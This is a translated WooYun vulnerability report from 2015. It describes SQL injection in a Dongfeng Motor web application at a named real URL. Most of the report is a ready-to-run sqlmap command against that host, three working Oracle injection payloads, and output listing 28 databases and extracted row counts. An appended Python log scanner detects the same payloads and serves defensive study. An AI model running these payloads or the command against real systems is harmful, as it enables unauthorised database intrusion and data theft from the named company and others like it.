
Vulnerability summary

Defect ID: wooyun-2015-0162260

Title: SQL injection at Dongfeng Motor Co., Ltd. (a China Top 500 company) exposes 28 databases

Affected vendor: dfyb.com

Author: 逆流冰河

Submitted: 2015-12-20 11:25

Fix time: 2015-12-25 11:26

Published: 2015-12-25 11:26

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-20: Details sent to the vendor; awaiting vendor response
2015-12-25: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

As the title says. Surely this one doesn't count as a small vendor?

Details:

1. Injection info: sqlmap -u "http://zhpt.dfl.com.cn/pipms/client/news_view.jsp?id=294" --batch
2. PoC
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=294' AND 8716=8716 AND 'tGIE'='tGIE
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=294' AND 3400=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3400=3400) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'LJuO'='LJuO
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=294' AND 6602=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(109)||CHR(122)||CHR(103),5) AND 'KxZa'='KxZa
---
web application technology: JSP
back-end DBMS: Oracle
available databases [28]:
[*] CTXSYS
[*] GI
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PIP_V
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SMP_BAK
[*] SMP_DBA
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
3. Picked one database at random; it turns out to have this many tables
Database: SMP_DBA
[546 tables]
4. The data volume is considerable
[22:56:18] [INFO] resumed: 860854
[22:56:18] [INFO] resumed: 3
[22:56:18] [INFO] resumed: 364850
[22:56:18] [INFO] resumed: 93185
[22:56:18] [INFO] resumed: 1377905
[22:56:18] [INFO] resumed: 106353
[22:56:18] [INFO] resumed: 76604
[22:56:18] [INFO] resumed: 1257879
[22:56:18] [INFO] resumed: 23825
[22:56:18] [INFO] resumed: 5248839
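As an added example (not part of the original report), the following Python scans web-server access logs for the three techniques sqlmap reported against the `id` parameter of news_view.jsp: boolean-based blind, Oracle XMLType error-based and DBMS_PIPE time-based blind. The log lines, IP address and the shortened payloads are constructed for the example; the decisive check is the first one, that `id` must be an integer, while the signatures only name the technique for triage (the actual fix is a parameterized query in the JSP, which the page does not show).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original report); the
# query strings mirror the three sqlmap payload classes shown on the page.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2015:22:56:18 +0800] "GET /pipms/client/news_view.jsp?id=294 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Dec/2015:22:56:19 +0800] "GET /pipms/client/news_view.jsp?id=294%27%20AND%208716%3D8716%20AND%20%27tGIE%27%3D%27tGIE HTTP/1.1" 200 5120
10.0.0.5 - - [20/Dec/2015:22:56:20 +0800] "GET /pipms/client/news_view.jsp?id=294%27%20AND%203400%3D(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)))%20FROM%20DUAL)%20AND%20%27LJuO%27%3D%27LJuO HTTP/1.1" 500 812
10.0.0.5 - - [20/Dec/2015:22:56:26 +0800] "GET /pipms/client/news_view.jsp?id=294%27%20AND%206602%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(109),5)%20AND%20%27KxZa%27%3D%27KxZa HTTP/1.1" 200 5120
"""

# Ordered signatures: the Oracle-specific techniques first, the generic
# quote-breaking tautology last. Matching is done on the decoded value.
SIGNATURES = [
    ("time-based blind (DBMS_PIPE)", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    ("error-based (XMLType)",        re.compile(r"\bXMLType\s*\(", re.I)),
    ("boolean-based blind",          re.compile(r"'\s*AND\s+\d+\s*=\s*\d+\s+AND\s+'", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_id_param(raw_url: str):
    """Return (decoded_id, verdict). `id` is expected to be an integer, so any
    other value is flagged; a matching signature names the technique."""
    qs = parse_qs(urlsplit(raw_url).query, keep_blank_values=True)  # percent-decodes
    if "id" not in qs:
        return None, "no id parameter"
    value = qs["id"][0]
    if value.isdigit():
        return value, "ok"
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return value, "sqli: " + name
    return value, "sqli: non-numeric id"

def scan_log(text: str):
    """Return [(line_no, verdict)] for every request whose id fails validation."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        _, verdict = classify_id_param(m.group(1))
        if verdict != "ok":
            findings.append((n, verdict))
    return findings

if __name__ == "__main__":
    for n, verdict in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```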

Proof of vulnerability:

Refuse the "small vendor" label

Remediation:

Refuse the "small vendor" label

Copyright notice: when reposting, credit the source: 逆流冰河@乌云


Vendor response

Vendor reply:

Severity: no impact, vendor ignored

Ignored on: 2015-12-25 11:26

Vendor comment:

Vulnerability rank: 4 (WooYun assessment)

Latest status:

None
